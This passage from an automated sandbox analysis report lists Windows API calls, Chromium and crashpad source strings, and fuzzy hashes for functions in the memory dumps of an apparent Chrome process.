                                                    • Opcode Fuzzy Hash: 951a7d850f4c2bbac0f021999a47352056103bc1c85eb36f8a9b940f3894f1dd
                                                    • Instruction Fuzzy Hash: DD113BB16003849FD7109F25DC4157BF7E8EFC5750F044A2EF8D5A7241E7B0A54987A2
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(00E79899,00000000,00000000), ref: 00D8283F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID: ..\..\base\files\file_util_win.cc$PathExists$ScopedBlockingCall
                                                    • API String ID: 3188754299-3474313534
                                                    • Opcode ID: 240fa06535b3972af2c1257991197328d1de2ab12b94ea33455f62bf68f0ac19
                                                    • Instruction ID: 51344218223712d46e39f1a2107c502d988e9a5fbb79eb1b684157570377999e
                                                    • Opcode Fuzzy Hash: 240fa06535b3972af2c1257991197328d1de2ab12b94ea33455f62bf68f0ac19
                                                    • Instruction Fuzzy Hash: F31129719043849FD710AF64DC8157BF7A4EFC5760F040A2EF8D1A7281E7B0A64987A2
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(bcryptprimitives.dll,00000008), ref: 00DDDF1B
                                                    • GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 00DDDF2B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: ProcessPrng$bcryptprimitives.dll
                                                    • API String ID: 2574300362-2667675608
                                                    • Opcode ID: 96a5233ba16c42dedd806fbc38ae62ef82935d1d3e91a00e274ad6917cb2b46b
                                                    • Instruction ID: 0ec7d0f75289047cb8a50bf901817b063783a0eece9c1bb9c1d98f9494aa85d7
                                                    • Opcode Fuzzy Hash: 96a5233ba16c42dedd806fbc38ae62ef82935d1d3e91a00e274ad6917cb2b46b
                                                    • Instruction Fuzzy Hash: 4301D4756402489FDA149F36EC45A37336BEBC5721B1D402AFD16BB3A0D730A845C672
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00EF4540,?,00000000,?,00DBDF3E,?,00000000,?,00000000,?,-00000048,?), ref: 00DBE24D
                                                    • ReleaseSRWLockExclusive.KERNEL32(00EF4540,?,00000000,?,00DBDF3E,?,00000000,?,00000000,?,-00000048,?), ref: 00DBE2A4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: @E$bitset set argument out of range
                                                    • API String ID: 17069307-1644405516
                                                    • Opcode ID: 527351f9791cd085dab17e29f1ea2e52a48511ec9f514c65df1a0a74bfc79490
                                                    • Instruction ID: 27da1418a997770f226bb8d40be3921c92239a1f3687977c79a720519efa6737
                                                    • Opcode Fuzzy Hash: 527351f9791cd085dab17e29f1ea2e52a48511ec9f514c65df1a0a74bfc79490
                                                    • Instruction Fuzzy Hash: D9116B33600128CBC71C5A549852AFE371ADBD1310F188139F943BB2D1D6B0CC85C2A8
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00EF4540,?,?,00DBA709,00000002,?,?,?), ref: 00DBB00C
                                                    • ReleaseSRWLockExclusive.KERNEL32(00EF4540,?,00DBA709,00000002,?,?,?), ref: 00DBB039
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: @E$bitset reset argument out of range
                                                    • API String ID: 17069307-1683922312
                                                    • Opcode ID: 55543c1fa9755bcb0905c2550bcbfe0fd75555df8dfee33a7a06ecff7dd952af
                                                    • Instruction ID: c456708c3f360188c265b74dc4f82005f5caab51458836e3aafb575f9b6200dd
                                                    • Opcode Fuzzy Hash: 55543c1fa9755bcb0905c2550bcbfe0fd75555df8dfee33a7a06ecff7dd952af
                                                    • Instruction Fuzzy Hash: C1012F7251421CC7CB1C7A18A8515FE2211DB97730B69421BF573F75E5D7E0CD45C261
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,00000000), ref: 00E0D722
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00E0D73F
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00E0D74D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$Release
                                                    • String ID: T
                                                    • API String ID: 1678258262-2757253332
                                                    • Opcode ID: 79e9fb97b1f23f7819d174d95e41645998b8c85e468f17603230f49ef4aff585
                                                    • Instruction ID: 9ecb611ecc46454fe4a4dd7dc6c60a9eddd9094a21154e45b9620df689606181
                                                    • Opcode Fuzzy Hash: 79e9fb97b1f23f7819d174d95e41645998b8c85e468f17603230f49ef4aff585
                                                    • Instruction Fuzzy Hash: 6A01F5352043449FC7114F41BC84979376AF7C4B55B1C102AF80BBB3A1D371AC49C751
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00E50328,00000000,00000001,?,?,?,?,00E501E6,00000002,FlsGetValue,00EC7188,00EC7190), ref: 00E50299
                                                    • GetLastError.KERNEL32(?,00E50328,00000000,00000001,?,?,?,?,00E501E6,00000002,FlsGetValue,00EC7188,00EC7190,00000000,?,00E41734), ref: 00E502A3
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,00E41734,?,00E54421), ref: 00E502CB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID: api-ms-
                                                    • API String ID: 3177248105-2084034818
                                                    • Opcode ID: 2c4765c22fd45327ec60ed4ff91b0fdb748e04c470f74dbfcb17144616e05eb5
                                                    • Instruction ID: c2c822a6f517377b052ca97196435b4e4b539cf68b29ff73d5b44431fa05643f
                                                    • Opcode Fuzzy Hash: 2c4765c22fd45327ec60ed4ff91b0fdb748e04c470f74dbfcb17144616e05eb5
                                                    • Instruction Fuzzy Hash: F3E0D83168034ABBEF301F51EC4EB593E999B11B45F180434FD0CB84F1DBA5AD958545
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32(ECFE467E,00000000,00000000,?), ref: 00E3D75A
                                                      • Part of subcall function 00E4A071: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00E43434,?,00000000,-00000008), ref: 00E4A0D2
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E3D9AC
                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00E3D9F2
                                                    • GetLastError.KERNEL32 ref: 00E3DA95
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                    • String ID:
                                                    • API String ID: 2112829910-0
                                                    • Opcode ID: 09012d369f91535083e72cf3761ff0dc5f49c863f8e7a170842c296985682601
                                                    • Instruction ID: f50e19952884231dfc2929656ef47fcf43594f8984ef676c0f79bea059f5659e
                                                    • Opcode Fuzzy Hash: 09012d369f91535083e72cf3761ff0dc5f49c863f8e7a170842c296985682601
                                                    • Instruction Fuzzy Hash: A9D18975D08249AFCF15CFA8D8849ADBFF5FF49304F28452AE416FB251D630A946CB50
                                                    APIs
                                                    • ResetEvent.KERNEL32(?), ref: 00D4342B
                                                    • ResetEvent.KERNEL32(?,00000001), ref: 00D434AF
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D434B9
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D434FB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: EventExclusiveLockReset$AcquireRelease
                                                    • String ID:
                                                    • API String ID: 1579669990-0
                                                    • Opcode ID: 42e0a735df83bfff80530aae5ba15b1b8e735938d2c83d6ac95dccbc2137df1f
                                                    • Instruction ID: 150e1530ec13926eb63c725057eea0f5c6fdace8fa255f39c05364d858c544a4
                                                    • Opcode Fuzzy Hash: 42e0a735df83bfff80530aae5ba15b1b8e735938d2c83d6ac95dccbc2137df1f
                                                    • Instruction Fuzzy Hash: 82519FB1A002159FDF00DF54D881AAABBB4FF48314F198069E80A6B352D735EE05CBF1
                                                    APIs
                                                    Strings
                                                    • create_thread_last_error, xrefs: 00D4AB2C
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D4AB01
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D4AAFA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$create_thread_last_error
                                                    • API String ID: 1452528299-2002432178
                                                    • Opcode ID: ed50c0cd2fcd5fa5f765678454c5ba2188e4e0d0702184a7d6de48e99785250b
                                                    • Instruction ID: 0d00edb85d051f6a66ca0624643f7094a8141464744b6aeef139213c3426d672
                                                    • Opcode Fuzzy Hash: ed50c0cd2fcd5fa5f765678454c5ba2188e4e0d0702184a7d6de48e99785250b
                                                    • Instruction Fuzzy Hash: E631F5B1E802159BDF10DB68FD87A7E73A5EB44704F085135F806B6292E7359818C773
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(00000000), ref: 00DF35FE
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF363B
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF365E
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF36C2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CounterPerformanceQuery
                                                    • String ID:
                                                    • API String ID: 374826692-0
                                                    • Opcode ID: e04738c0dfa360ad9e1102fee34b24cf1dc0a2ffa5e7565b8746c958d90f9f1f
                                                    • Instruction ID: 7eacb709c4fe6728a03dbe2d19370c09b801d84a3be38ad47d67a54afa3c4306
                                                    • Opcode Fuzzy Hash: e04738c0dfa360ad9e1102fee34b24cf1dc0a2ffa5e7565b8746c958d90f9f1f
                                                    • Instruction Fuzzy Hash: 2C315EB1608305AFC708DF59E88692BFBE9EBC8314F05882DF685D7361D734A948CB52
                                                    APIs
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D47F22), ref: 00D48367
                                                    Strings
                                                    • Free, xrefs: 00D483C0
                                                    • CloseHandle, xrefs: 00D483DD
                                                    • ..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc, xrefs: 00D483BB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc$CloseHandle$Free
                                                    • API String ID: 2962429428-1704384866
                                                    • Opcode ID: 671e1658aaf3a80fb3b9d72a21c17bc67e3cb3f9085489e341258c7f5d78f4b3
                                                    • Instruction ID: a57166b83f206fe078978d13238bb24165fe30e41fee9c4b7b464bf1e0a476f0
                                                    • Opcode Fuzzy Hash: 671e1658aaf3a80fb3b9d72a21c17bc67e3cb3f9085489e341258c7f5d78f4b3
                                                    • Instruction Fuzzy Hash: 542126B0A003445BDB20AF349C4DA6F77E4AF44754F084E1CE596AB2D2EB70E90997B1
                                                    APIs
                                                    • CloseHandle.KERNEL32(?,?,?,?,00000004,?,?,?,?,.pma,00000004,?,?,00E7992D,?,00E7992D), ref: 00D7AD8A
                                                    Strings
                                                    • ~Semaphore, xrefs: 00D7AE01
                                                    • ..\..\third_party\crashpad\crashpad\util\synchronization\semaphore_win.cc, xrefs: 00D7ADFC
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00D7AE2B
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\synchronization\semaphore_win.cc$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$~Semaphore
                                                    • API String ID: 2962429428-2974306023
                                                    • Opcode ID: d46e896e97ce6ec69b550db45998ced3fff00b36f512acb43c818f10f3c22d0a
                                                    • Instruction ID: d81fe68563ff1fd8f4da5109e1f471eab0ff5c2e3eb4ee85fb755f4672ec9892
                                                    • Opcode Fuzzy Hash: d46e896e97ce6ec69b550db45998ced3fff00b36f512acb43c818f10f3c22d0a
                                                    • Instruction Fuzzy Hash: 8F2107B16002049FDB20AB64DC45A6E77E8AF85305B58942DF54B7BA82F731EC058762
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9ac7636924dff855ee81e46829cf2cf9e43d3b98a03b9d787c3c8f3d5b4fb4e
                                                    • Instruction ID: f25c11d52af882876194272b4e00a773a2e5ab9bf7d33c90428e8cd6def60343
                                                    • Opcode Fuzzy Hash: b9ac7636924dff855ee81e46829cf2cf9e43d3b98a03b9d787c3c8f3d5b4fb4e
                                                    • Instruction Fuzzy Hash: 00218331600205AFDB20AF61DD8986AFBAAAF11368F1D6535F495B7150DB30EC90C762
                                                    APIs
                                                    • TlsGetValue.KERNEL32(00000000), ref: 00D4A142
                                                    • TlsSetValue.KERNEL32(00000000,?), ref: 00D4A16F
                                                    • TlsSetValue.KERNEL32(00000000,00000000), ref: 00D4A198
                                                    • TlsAlloc.KERNEL32 ref: 00D4A1B5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
